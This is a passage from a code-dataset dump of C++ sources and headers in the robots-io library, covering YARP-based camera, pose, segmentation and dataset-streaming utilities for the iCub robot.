"content_id": "719dbc56761c03f6cad5ae53a28da851c42b955e",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1396,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 61,
"path": "/src/RobotsIO/src/Utils/DatasetDataStreamDelayed.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/DatasetDataStreamDelayed.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\n\n\nDatasetDataStreamDelayed::DatasetDataStreamDelayed\n(\n const double& fps,\n const double& simulated_fps,\n const bool simulate_inference_time,\n const std::string& file_path,\n const std::size_t& skip_rows,\n const std::size_t& skip_cols,\n const std::size_t& expected_cols,\n const int rx_time_index,\n const int tx_time_index\n) :\n DatasetDataStream(file_path, skip_rows, skip_cols, expected_cols, rx_time_index, tx_time_index),\n delay_(static_cast<int>(fps / simulated_fps)),\n simulate_inference_time_(simulate_inference_time)\n{\n if (simulate_inference_time_)\n set_head(get_head() - delay_ + skip_rows);\n}\n\n\nDatasetDataStreamDelayed::~DatasetDataStreamDelayed()\n{}\n\n\nVectorXd DatasetDataStreamDelayed::data()\n{\n int head = get_head();\n\n if (simulate_inference_time_)\n {\n if (head < 0)\n head = 0;\n }\n\n return DatasetDataStream::data(head);\n}\n\n\nbool DatasetDataStreamDelayed::freeze()\n{\n DatasetDataStream::freeze();\n\n if ((get_head() % delay_) != 0)\n return false;\n\n return true;\n}\n"
},
{
"alpha_fraction": 0.6901408433914185,
"alphanum_fraction": 0.6983568072319031,
"avg_line_length": 24.81818199157715,
"blob_id": "6f353587e0f51661a1899f4692782f116f670927",
"content_id": "fdc510a0741d91906b861cea52fda8facab65563",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1704,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 66,
"path": "/src/RobotsIO/src/Utils/DatasetTransformDelayed.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/DatasetTransformDelayed.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\n\n\nDatasetTransformDelayed::DatasetTransformDelayed\n(\n const double& fps,\n const double& simulated_fps,\n const bool simulate_inference_time,\n const std::string& file_path,\n const std::size_t& skip_rows,\n const std::size_t& skip_cols,\n const std::size_t& expected_cols,\n const int rx_time_index,\n const int tx_time_index\n) :\n DatasetDataStreamDelayed(fps, simulated_fps, simulate_inference_time, file_path, skip_rows, skip_cols, expected_cols, rx_time_index, tx_time_index),\n fps_(fps),\n simulated_fps_(simulated_fps)\n{}\n\n\nDatasetTransformDelayed::~DatasetTransformDelayed()\n{}\n\n\nEigen::Transform<double, 3, Eigen::Affine> DatasetTransformDelayed::transform()\n{\n return transform_;\n}\n\n\nbool DatasetTransformDelayed::freeze(const bool blocking)\n{\n if (!DatasetDataStreamDelayed::freeze())\n return false;\n\n VectorXd transform_data = data();\n\n bool invalid_pose = true;\n for (std::size_t i = 0; i < transform_data.size(); i++)\n invalid_pose &= (transform_data(i) == 0.0);\n if (invalid_pose)\n return false;\n\n transform_ = Translation<double, 3>(transform_data.head<3>());\n AngleAxisd rotation(transform_data(6), transform_data.segment<3>(3));\n transform_.rotate(rotation);\n\n return true;\n}\n\n\nint DatasetTransformDelayed::get_frames_between_iterations() const\n{\n return int(fps_ / simulated_fps_);\n}\n"
},
{
"alpha_fraction": 0.6591792702674866,
"alphanum_fraction": 0.6622030138969421,
"avg_line_length": 23.11458396911621,
"blob_id": "157d0a85926585f0a1bcca6108d0f74804739a0f",
"content_id": "c24c27e32d2c7a45690b904e70a96ca277230c6a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2315,
"license_type": "permissive",
"max_line_length": 204,
"num_lines": 96,
"path": "/src/RobotsIO/include/RobotsIO/Camera/YarpCamera.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_YARPCAMERA_H\n#define ROBOTSIO_YARPCAMERA_H\n\n#include <RobotsIO/Camera/Camera.h>\n\n#include <Eigen/Dense>\n\n#include <opencv2/opencv.hpp>\n\n#include <string>\n\n#include <yarp/os/BufferedPort.h>\n#include <yarp/os/Network.h>\n#include <yarp/sig/Image.h>\n#include <yarp/sig/Vector.h>\n\nnamespace RobotsIO {\n namespace Camera {\n class YarpCamera;\n }\n}\n\nclass RobotsIO::Camera::YarpCamera : public RobotsIO::Camera::Camera\n{\npublic:\n\n YarpCamera(const std::string& port_prefix, const bool& network_bootstrap = false);\n\n YarpCamera(const std::size_t& width, const std::size_t& height, const double& fx, const double& cx, const double& fy, const double& cy, const std::string& port_prefix, const bool& enable_camera_pose);\n\n YarpCamera(const std::string& data_path, const std::size_t& width, const double& height, const double& fx, const double& cx, const double& fy, const double& cy);\n\n ~YarpCamera();\n\n /**\n * RGB-D and pose.\n */\n\n std::pair<bool, Eigen::Transform<double, 3, Eigen::Affine>> pose(const bool& blocking) override;\n\n std::pair<bool, cv::Mat> rgb(const bool& blocking) override;\n\n std::pair<bool, Eigen::MatrixXf> depth(const bool& blocking) override;\n\n std::pair<bool, double> time_stamp_rgb() const override;\n\n std::pair<bool, double> time_stamp_depth() const override;\n\nprivate:\n yarp::os::Network yarp_;\n\n /**\n * RGB-D sources.\n */\n\n yarp::os::BufferedPort<yarp::sig::ImageOf<yarp::sig::PixelFloat>> port_depth_;\n\n yarp::os::BufferedPort<yarp::sig::ImageOf<yarp::sig::PixelRgb>> port_rgb_;\n\n /**\n * Pose source.\n */\n\n yarp::os::BufferedPort<yarp::sig::Vector> port_pose_;\n\n bool enable_camera_pose_ = false;\n\n yarp::sig::Vector last_camera_pose_;\n\n /**\n * Timestamp.\n */\n\n double time_stamp_rgb_;\n\n double time_stamp_depth_;\n\n bool is_time_stamp_rgb_ = false;\n\n bool is_time_stamp_depth_ = false;\n\n /**\n * Log name to be used in messages printed by the class.\n */\n\n const std::string log_name_ = \"YarpCamera\";\n};\n\n#endif /* ROBOTSIO_YARPCAMERA_H */\n"
},
{
"alpha_fraction": 0.6019480228424072,
"alphanum_fraction": 0.6123376488685608,
"avg_line_length": 23.838708877563477,
"blob_id": "0b9a2bd65ea2f908f0729ba78767e7d2c9368ea9",
"content_id": "018927109a1e387bf9a31f94ce0dc300dc53c97c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1540,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 62,
"path": "/src/RobotsIO/src/Utils/DepthToFile.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/DepthToFile.h>\n\n#include <opencv2/core/eigen.hpp>\n\n#include <iostream>\n\nusing namespace Eigen;\n\n\nbool RobotsIO::Utils::depth_to_file(const std::string& output_path, const cv::Mat& depth)\n{\n const std::string log_name = \"RobotsIO::Utils::depth_to_file\";\n\n std::FILE* out;\n\n if ((out = std::fopen(output_path.c_str(), \"wb\")) == nullptr)\n {\n std::cout << log_name << \"Error: cannot open output file \" + output_path << std::endl;\n return false;\n }\n\n /* Write image size. */\n std::size_t dims[2];\n dims[0] = depth.cols;\n dims[1] = depth.rows;\n if (std::fwrite(dims, sizeof(dims), 1, out) != 1)\n {\n std::cout << log_name << \"Error: cannot write image size to \" + output_path << std::endl;\n\n fclose(out);\n\n return false;\n }\n\n if (std::fwrite(depth.data, sizeof(float), dims[0] * dims[1], out) != dims[0] * dims[1])\n {\n std::cout << log_name << \"Error: cannot write image data to \" + output_path << std::endl;\n\n fclose(out);\n\n return false;\n }\n\n std::fclose(out);\n\n return true;\n}\n\n\nbool RobotsIO::Utils::depth_to_file(const std::string& output_path, const MatrixXf& depth)\n{\n cv::Mat depth_cv;\n cv::eigen2cv(depth, depth_cv);\n return RobotsIO::Utils::depth_to_file(output_path, depth_cv);\n}\n"
},
{
"alpha_fraction": 0.7279362678527832,
"alphanum_fraction": 0.7385534048080444,
"avg_line_length": 23.704917907714844,
"blob_id": "c3517d04eff443397ea1126039342a7641d6cce8",
"content_id": "eca2754cb23cff832ea9bdacb5c5e4d43147cce7",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1507,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 61,
"path": "/src/RobotsIO/src/Utils/TransformWithVelocityYarpPort.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/TransformWithVelocityYarpPort.h>\n\n#include <yarp/eigen/Eigen.h>\n#include <yarp/sig/Vector.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\nusing namespace yarp::eigen;\nusing namespace yarp::sig;\n\n\nTransformWithVelocityYarpPort::TransformWithVelocityYarpPort(const std::string& port_name) :\n YarpBufferedPort<yarp::sig::Vector>(port_name)\n{}\n\n\nTransformWithVelocityYarpPort:: ~TransformWithVelocityYarpPort()\n{}\n\n\nEigen::Transform<double, 3, Affine> TransformWithVelocityYarpPort::transform()\n{\n return transform_;\n}\n\n\nEigen::Vector3d TransformWithVelocityYarpPort::linear_velocity()\n{\n return linear_velocity_;\n}\n\n\nEigen::Vector3d TransformWithVelocityYarpPort::angular_velocity()\n{\n return angular_velocity_;\n}\n\n\nbool TransformWithVelocityYarpPort::freeze(const bool blocking)\n{\n yarp::sig::Vector* transform_yarp = receive_data(blocking);\n\n if (transform_yarp == nullptr)\n return false;\n\n transform_ = Translation<double, 3>(toEigen(*transform_yarp).head<3>());\n AngleAxisd rotation((*transform_yarp)(6), toEigen(*transform_yarp).segment<3>(3));\n transform_.rotate(rotation);\n\n linear_velocity_ = toEigen(*transform_yarp).segment<3>(7);\n angular_velocity_ = toEigen(*transform_yarp).tail<3>();\n\n return true;\n}\n"
},
{
"alpha_fraction": 0.6985815763473511,
"alphanum_fraction": 0.7028368711471558,
"avg_line_length": 26.647058486938477,
"blob_id": "5a1fff83622d96e2ce0b59ed402534576f245468",
"content_id": "d15ea60900f49a85bae2d5a3e841f2904ff42d55",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1410,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 51,
"path": "/src/RobotsIO/include/RobotsIO/Utils/ParametersYarpPort.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_PARAMETERSYARPPORT_H\n#define ROBOTSIO_PARAMETERSYARPPORT_H\n\n#include <RobotsIO/Utils/ParametersFiller.h>\n#include <RobotsIO/Utils/YarpBufferedPort.hpp>\n\n#include <yarp/os/Bottle.h>\n\n#include <string>\n\nnamespace RobotsIO {\n namespace Utils {\n class ParametersYarpPort;\n }\n}\n\n\nclass RobotsIO::Utils::ParametersYarpPort : public RobotsIO::Utils::YarpBufferedPort<yarp::os::Bottle>,\n public RobotsIO::Utils::ParametersFiller\n{\npublic:\n ParametersYarpPort(const std::string& port_name);\n\n virtual ~ParametersYarpPort();\n\n bool receive_parameters();\n\n const std::pair<bool, std::string> fill_string(const std::string& key) const override;\n\n const std::pair<bool, std::size_t> fill_size_t(const std::string& key) const override;\n\n const std::pair<bool, int> fill_int(const std::string& key) const override;\n\n const std::pair<bool, double> fill_double(const std::string& key) const override;\n\n const std::pair<bool, bool> fill_bool(const std::string& key) const override;\n\nprivate:\n yarp::os::Bottle last_parameters_;\n\n bool data_available_ = false;\n};\n\n#endif /* ROBOTSIO_YARPBOTTLE2PARAMETERS_H */\n"
},
{
"alpha_fraction": 0.5781438946723938,
"alphanum_fraction": 0.590674877166748,
"avg_line_length": 28.662263870239258,
"blob_id": "40edafb9dbc6627d13109e0cdd9b3b8056b2b27a",
"content_id": "b09e703ba17f4c4c0c5b2055dcbaebf0cf8de3f0",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 15721,
"license_type": "permissive",
"max_line_length": 169,
"num_lines": 530,
"path": "/src/RobotsIO/src/Camera/iCubCamera.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Camera/iCubCamera.h>\n\n#include <iostream>\n\n#include <unsupported/Eigen/MatrixFunctions>\n\n#include <yarp/cv/Cv.h>\n#include <yarp/eigen/Eigen.h>\n#include <yarp/os/LogStream.h>\n#include <yarp/os/Property.h>\n#include <yarp/os/ResourceFinder.h>\n#include <yarp/sig/Image.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Camera;\nusing namespace iCub::iKin;\nusing namespace yarp::cv;\nusing namespace yarp::eigen;\nusing namespace yarp::os;\nusing namespace yarp::sig;\n\n\niCubCamera::iCubCamera\n(\n const std::string& robot_name,\n const std::string& laterality,\n const std::string& port_prefix,\n const bool& use_calibration,\n const std::string& calibration_path\n) :\n laterality_(laterality),\n use_calibration_(use_calibration)\n{\n /* Check YARP network. */\n if (!yarp_.checkNetwork())\n {\n throw(std::runtime_error(log_name_ + \"::ctor. Error: YARP network is not available.\"));\n }\n\n /* Check laterality. */\n if ((laterality_ != \"left\") && (laterality_ != \"right\"))\n {\n std::string err = log_name_ + \"::ctor. Please use a valid laterality when constructing the iCubCamera instance.\";\n throw(std::runtime_error(err));\n }\n\n /* Prepare properties for the GazeController. */\n Property properties;\n properties.put(\"device\", \"gazecontrollerclient\");\n properties.put(\"remote\", \"/iKinGazeCtrl\");\n properties.put(\"local\", \"/\" + port_prefix + \"/gazecontroller\");\n\n /* Open driver. */\n bool ok = driver_gaze_.open(properties) && driver_gaze_.view(gaze_control_) && (gaze_control_ != nullptr);\n\n if (ok)\n {\n /* Retrieve camera parameters. */\n Bottle info;\n std::string key;\n gaze_control_->getInfo(info);\n\n key = \"camera_width_\" + laterality_;\n if (info.find(key).isNull())\n {\n std::string err = log_name_ + \"::ctor. Error: cannot load iCub \" + laterality_ + \" camera width.\";\n throw(std::runtime_error(err));\n }\n parameters_.width(info.find(key).asInt32());\n\n key = \"camera_height_\" + laterality_;\n if (info.find(key).isNull())\n {\n std::string err = log_name_ + \"::ctor. Error: cannot load iCub \" + laterality_ + \" camera height.\";\n throw(std::runtime_error(err));\n }\n parameters_.height(info.find(key).asInt32());\n\n key = \"camera_intrinsics_\" + laterality_;\n if (info.find(key).isNull())\n {\n std::string err = log_name_ + \"::ctor. Error: cannot load iCub \" + laterality_ + \" camera intrinsic parameters.\";\n throw(std::runtime_error(err));\n }\n Bottle *list = info.find(key).asList();\n parameters_.fx(list->get(0).asFloat64());\n parameters_.cx(list->get(2).asFloat64());\n parameters_.fy(list->get(5).asFloat64());\n parameters_.cy(list->get(6).asFloat64());\n\n parameters_.initialized(true);\n }\n else\n {\n /* Stick to encoders .*/\n use_driver_gaze_ = false;\n\n /* TODO: take parameters from a configuration file. */\n parameters_.width(640);\n parameters_.height(480);\n if (laterality_ == \"left\")\n {\n parameters_.fx(468.672);\n parameters_.cx(323.045);\n parameters_.fy(467.73);\n parameters_.cy(245.784);\n }\n else\n {\n parameters_.fx(468.488);\n parameters_.cx(301.274);\n parameters_.fy(467.427);\n parameters_.cy(245.503);\n }\n parameters_.initialized(true);\n\n /* Configure torso. */\n Property properties;\n properties.put(\"device\", \"remote_controlboard\");\n properties.put(\"local\", \"/\" + port_prefix + \"/torso:i\");\n properties.put(\"remote\", \"/\" + robot_name + \"/torso\");\n ok = drv_torso_.open(properties) && drv_torso_.view(itorso_) && (itorso_ != nullptr);\n if (!ok)\n {\n std::string err = log_name_ + \"::ctor. Error: cannot open remote control board for torso.\";\n throw(std::runtime_error(err));\n }\n\n /* Configure forward kinematics. */\n left_eye_kinematics_ = iCubEye(\"left_v2\");\n right_eye_kinematics_ = iCubEye(\"right_v2\");\n\n left_eye_kinematics_.setAllConstraints(false);\n right_eye_kinematics_.setAllConstraints(false);\n\n left_eye_kinematics_.releaseLink(0);\n left_eye_kinematics_.releaseLink(1);\n left_eye_kinematics_.releaseLink(2);\n right_eye_kinematics_.releaseLink(0);\n right_eye_kinematics_.releaseLink(1);\n right_eye_kinematics_.releaseLink(2);\n }\n\n /* Configure head.\n We require this anyway in order to provide inputs to the calibration model. */\n properties.put(\"device\", \"remote_controlboard\");\n properties.put(\"local\", \"/\" + port_prefix + \"/head:i\");\n properties.put(\"remote\", \"/\" + robot_name + \"/head\");\n ok = drv_head_.open(properties) && drv_head_.view(ihead_) && (ihead_ != nullptr);\n if (!ok)\n {\n std::string err = log_name_ + \"::ctor. Error: cannot open remote control board for head.\";\n throw(std::runtime_error(err));\n }\n\n /* Load calibration if requested. */\n if (use_calibration_)\n if (!load_calibration_model(calibration_path))\n {\n std::string err = log_name_ + \"::ctor. Error: cannot load calibration model.\";\n throw(std::runtime_error(err));\n }\n\n /* Open rgb input port. */\n if (!(port_rgb_.open(\"/\" + port_prefix + \"/rgb:i\")))\n {\n std::string err = log_name_ + \"::ctor. Error: cannot open rgb input port.\";\n throw(std::runtime_error(err));\n }\n\n /* Open depth input port. */\n if (!(port_depth_.open(\"/\" + port_prefix + \"/depth:i\")))\n {\n std::string err = log_name_ + \"::ctor. Error: cannot open depth input port.\";\n throw(std::runtime_error(err));\n }\n\n Camera::initialize();\n\n /* Log parameters. */\n std::cout << log_name_ + \"::ctor. Camera parameters:\" << std::endl;\n std::cout << log_name_ + \" - width: \" << parameters_.width() << std::endl;\n std::cout << log_name_ + \" - height: \" << parameters_.height() << std::endl;\n std::cout << log_name_ + \" - fx: \" << parameters_.fx() << std::endl;\n std::cout << log_name_ + \" - fy: \" << parameters_.fy() << std::endl;\n std::cout << log_name_ + \" - cx: \" << parameters_.cx() << std::endl;\n std::cout << log_name_ + \" - cy: \" << parameters_.cy() << std::endl;\n}\n\n\niCubCamera::iCubCamera\n(\n const std::string& data_path,\n const std::string& laterality,\n const std::size_t& width,\n const size_t& height,\n const double& fx,\n const double& cx,\n const double& fy,\n const double& cy,\n const bool& load_encoders_data,\n const bool& use_calibration,\n const std::string& calibration_path\n) :\n Camera(data_path, width, height, fx, cx, fy, cy),\n laterality_(laterality),\n load_encoders_data_(load_encoders_data),\n use_calibration_(use_calibration)\n{\n /* Load calibration if requested. */\n if (use_calibration_)\n if (!load_calibration_model(calibration_path))\n {\n std::string err = log_name_ + \"::ctor. Error: cannot load calibration model.\";\n throw(std::runtime_error(err));\n }\n\n Camera::initialize();\n}\n\n\niCubCamera::~iCubCamera()\n{\n /* Close driver. */\n if (use_driver_gaze_)\n driver_gaze_.close();\n else\n {\n drv_torso_.close();\n drv_head_.close();\n }\n\n /* Close ports. */\n port_rgb_.close();\n\n port_depth_.close();\n}\n\n\nbool iCubCamera::is_controller_available()\n{\n return use_driver_gaze_;\n}\n\n\nyarp::dev::IGazeControl& iCubCamera::controller()\n{\n return *gaze_control_;\n}\n\n\nstd::pair<bool, MatrixXf> iCubCamera::depth(const bool& blocking)\n{\n if (is_offline())\n return Camera::depth_offline();\n\n ImageOf<PixelFloat>* image_in;\n image_in = port_depth_.read(blocking);\n\n if (image_in == nullptr)\n return std::make_pair(false, MatrixXf());\n\n Stamp stamp;\n port_depth_.getEnvelope(stamp);\n time_stamp_depth_ = stamp.getTime();\n is_time_stamp_depth_ = true;\n\n cv::Mat image = yarp::cv::toCvMat(*image_in);\n Map<Eigen::Matrix<float, Dynamic, Dynamic, Eigen::RowMajor>> depth(image.ptr<float>(), image.rows, image.cols);\n\n return std::make_pair(true, depth);\n}\n\n\nstd::pair<bool, Transform<double, 3, Affine>> iCubCamera::pose(const bool& blocking)\n{\n bool valid_pose = false;\n Transform<double, 3, Affine> pose;\n\n if (is_offline())\n std::tie(valid_pose, pose) = Camera::pose_offline();\n else\n std::tie(valid_pose, pose) = laterality_pose(laterality_, blocking);\n\n if (!valid_pose)\n return std::make_pair(false, Transform<double, 3, Affine>());\n\n /* If calibration was loaded and eye encoders are available, correct pose of right eye. */\n if ((laterality() == \"right\") && use_calibration_)\n {\n bool valid_encoders_input = false;\n if ((ihead_ != nullptr) || (load_encoders_data_))\n {\n /* Set input. */\n Eigen::VectorXd head_encoders(6);\n std::tie(valid_encoders_input, head_encoders) = auxiliary_data(true);\n\n /* Corrrect pose of the righe eye. */\n if (valid_encoders_input)\n {\n yarp::sig::Vector input(3);\n toEigen(input) = head_encoders.tail<3>() * M_PI / 180.0;\n\n /* Get prediction. */\n yarp::sig::Vector prediction = calibration_.predict(input).getPrediction();\n\n /* Convert to SE3. */\n Eigen::Transform<double, 3, Eigen::Affine> output = exp_map(yarp::eigen::toEigen(prediction));\n\n pose = pose * output;\n }\n }\n\n if (!valid_encoders_input)\n std::cout << log_name_ + \"::pose. Warning: calibration requested, however eyes encoders cannot be retrieved.\" << std::endl;\n }\n\n return std::make_pair(true, pose);\n}\n\n\nstd::pair<bool, cv::Mat> iCubCamera::rgb(const bool& blocking)\n{\n if (is_offline())\n return Camera::rgb_offline();\n\n ImageOf<PixelRgb>* image_in;\n image_in = port_rgb_.read(blocking);\n\n if (image_in == nullptr)\n return std::make_pair(false, cv::Mat());\n\n Stamp stamp;\n port_rgb_.getEnvelope(stamp);\n time_stamp_rgb_ = stamp.getTime();\n is_time_stamp_rgb_ = true;\n\n cv::Mat image = yarp::cv::toCvMat(*image_in);\n\n return std::make_pair(true, image);\n}\n\n\nstd::pair<bool, double> iCubCamera::time_stamp_rgb() const\n{\n if (is_offline())\n return Camera::time_stamp_rgb_offline();\n\n return std::make_pair(is_time_stamp_rgb_, time_stamp_rgb_);\n}\n\n\nstd::pair<bool, double> iCubCamera::time_stamp_depth() const\n{\n if (is_offline())\n return Camera::time_stamp_depth_offline();\n\n return std::make_pair(is_time_stamp_depth_, time_stamp_depth_);\n}\n\n\nstd::pair<bool, Eigen::VectorXd> iCubCamera::auxiliary_data(const bool& blocking)\n{\n if (is_offline())\n return Camera::auxiliary_data_offline();\n\n /* Gaze driver do not provides additional information from encoders. */\n if (use_driver_gaze_)\n return std::make_pair(false, VectorXd());\n\n yarp::sig::Vector torso_encoders_(3);\n yarp::sig::Vector head_encoders_(6);\n\n if (!itorso_->getEncoders(torso_encoders_.data()))\n return std::make_pair(false, VectorXd());\n\n if (!ihead_->getEncoders(head_encoders_.data()))\n return std::make_pair(false, VectorXd());\n\n VectorXd encoders(9);\n encoders.head<3>() = toEigen(torso_encoders_);\n encoders.tail<6>() = toEigen(head_encoders_);\n\n return std::make_pair(true, encoders);\n}\n\n\nstd::size_t iCubCamera::auxiliary_data_size() const\n{\n /* Auxiliary data are torso (3) and head (6) encoders. */\n if (load_encoders_data_)\n return 3 + 6;\n\n return 0;\n}\n\n\nstd::string iCubCamera::laterality()\n{\n return laterality_;\n}\n\n\nstd::pair<bool, Eigen::Transform<double, 3, Eigen::Affine>> iCubCamera::laterality_pose(const std::string& laterality, const bool& blocking)\n{\n Transform<double, 3, Affine> pose;\n\n yarp::sig::Vector position_yarp;\n yarp::sig::Vector orientation_yarp;\n\n bool ok = getLateralityEyePose(laterality, position_yarp, orientation_yarp);\n\n if (!ok)\n return std::make_pair(false, Transform<double, 3, Affine>());\n\n pose = Translation<double, 3>(toEigen(position_yarp));\n pose.rotate(AngleAxisd(orientation_yarp(3), toEigen(orientation_yarp).head<3>()));\n\n return std::make_pair(true, pose);\n}\n\n\nvoid iCubCamera::set_laterality(const std::string& laterality)\n{\n laterality_ = laterality;\n}\n\n\nbool iCubCamera::getLateralityEyePose(const std::string& laterality, yarp::sig::Vector& position, yarp::sig::Vector& orientation)\n{\n if ((laterality != \"left\") && (laterality != \"right\"))\n return false;\n\n if (use_driver_gaze_)\n {\n if (laterality == \"left\")\n return gaze_control_->getLeftEyePose(position, orientation);\n else\n return gaze_control_->getRightEyePose(position, orientation);\n }\n else\n {\n yarp::sig::Vector torso_encoders_(3);\n yarp::sig::Vector head_encoders_(6);\n\n if (!itorso_->getEncoders(torso_encoders_.data()))\n return false;\n\n if (!ihead_->getEncoders(head_encoders_.data()))\n return false;\n\n yarp::sig::Vector chain_joints(8);\n chain_joints(0) = torso_encoders_(2);\n chain_joints(1) = torso_encoders_(1);\n chain_joints(2) = torso_encoders_(0);\n chain_joints(3) = head_encoders_(0);\n chain_joints(4) = head_encoders_(1);\n chain_joints(5) = head_encoders_(2);\n chain_joints(6) = head_encoders_(3);\n\n double version = head_encoders_(4);\n double vergence = head_encoders_(5);\n\n if (laterality == \"left\")\n chain_joints(7) = version + vergence / 2.0;\n else\n chain_joints(7) = version - vergence / 2.0;\n\n yarp::sig::Vector pose;\n if (laterality == \"left\")\n pose = left_eye_kinematics_.EndEffPose(chain_joints * M_PI / 180.0);\n else\n pose = right_eye_kinematics_.EndEffPose(chain_joints * M_PI / 180.0);\n\n position.resize(3);\n orientation.resize(4);\n position = pose.subVector(0, 2);\n orientation = pose.subVector(3, 6);\n\n return true;\n }\n}\n\n\nEigen::Transform<double, 3, Eigen::Affine> iCubCamera::exp_map(const Eigen::VectorXd& se3)\n{\n Eigen::Transform<double, 3, Eigen::Affine> SE3;\n\n Eigen::Matrix3d log_R = Eigen::Matrix3d::Zero();\n log_R(0, 1) = -1.0 * se3(5);\n log_R(0, 2) = se3(4);\n log_R(1, 0) = se3(5);\n log_R(1, 2) = -1.0 * se3(3);\n log_R(2, 0) = -1.0 * se3(4);\n log_R(2, 1) = se3(3);\n\n double theta = se3.tail<3>().norm() + std::numeric_limits<double>::epsilon();\n Eigen::Matrix3d V = Eigen::Matrix3d::Identity() + (1 - std::cos(theta)) / (theta * theta) * log_R + (theta - std::sin(theta)) / (std::pow(theta, 3)) * log_R * log_R;\n\n SE3 = Eigen::Translation<double, 3>(V * se3.head<3>());\n SE3.rotate(log_R.exp());\n\n return SE3;\n}\n\n\nbool iCubCamera::load_calibration_model(const std::string& model_path)\n{\n std::ifstream model_in;\n model_in.open(model_path);\n if (!model_in.is_open())\n return false;\n\n Bottle model;\n std::stringstream ss;\n ss << model_in.rdbuf();\n model.fromString(ss.str());\n model_in.close();\n\n calibration_.readBottle(model);\n\n return true;\n}\n"
},
{
"alpha_fraction": 0.7097436189651489,
"alphanum_fraction": 0.7123076915740967,
"avg_line_length": 27.2608699798584,
"blob_id": "5c6263b931cfe08d55bbc9759b1570cc6302d272",
"content_id": "7f7dedd1b235920d5e96138b0496985bf7e22ad1",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1950,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 69,
"path": "/src/RobotsIO/include/RobotsIO/Utils/SegmentationYarpPort.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2021 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_SEGMENTATIONYARPPORT_H\n#define ROBOTSIO_SEGMENTATIONYARPPORT_H\n\n#include <RobotsIO/Utils/Segmentation.h>\n#include <RobotsIO/Utils/YarpBufferedPort.hpp>\n\n#include <yarp/sig/Image.h>\n\nnamespace RobotsIO {\n namespace Utils {\n class SegmentationYarpPort;\n }\n}\n\n\nclass RobotsIO::Utils::SegmentationYarpPort : public RobotsIO::Utils::Segmentation\n{\npublic:\n\n /**\n * Initialize a Segmentation instance which uses YARP ports to receive segmentation masks and\n * (optionally) provide RGB images to the segmentation module.\n *\n * Required port names are composed as <port_prefix>/segmentation:i and <port_prefix>/rgb:o.\n */\n SegmentationYarpPort(const std::string& port_prefix, const bool& provide_rgb);\n\n virtual ~SegmentationYarpPort();\n\n bool reset() override;\n\n bool is_stepping_required() const override;\n\n int get_frames_between_iterations() const override;\n\n std::pair<bool, cv::Mat> segmentation(const bool& blocking) override;\n\n std::pair<bool, cv::Mat> latest_segmentation() override;\n\n virtual double get_time_stamp() override;\n\n virtual void set_rgb_image(const cv::Mat& image, const double& timestamp) override;\n\nprivate:\n\n RobotsIO::Utils::YarpBufferedPort<yarp::sig::ImageOf<yarp::sig::PixelMono>> segmentation_in_;\n\n RobotsIO::Utils::YarpBufferedPort<yarp::sig::ImageOf<yarp::sig::PixelRgb>> rgb_out_;\n\n 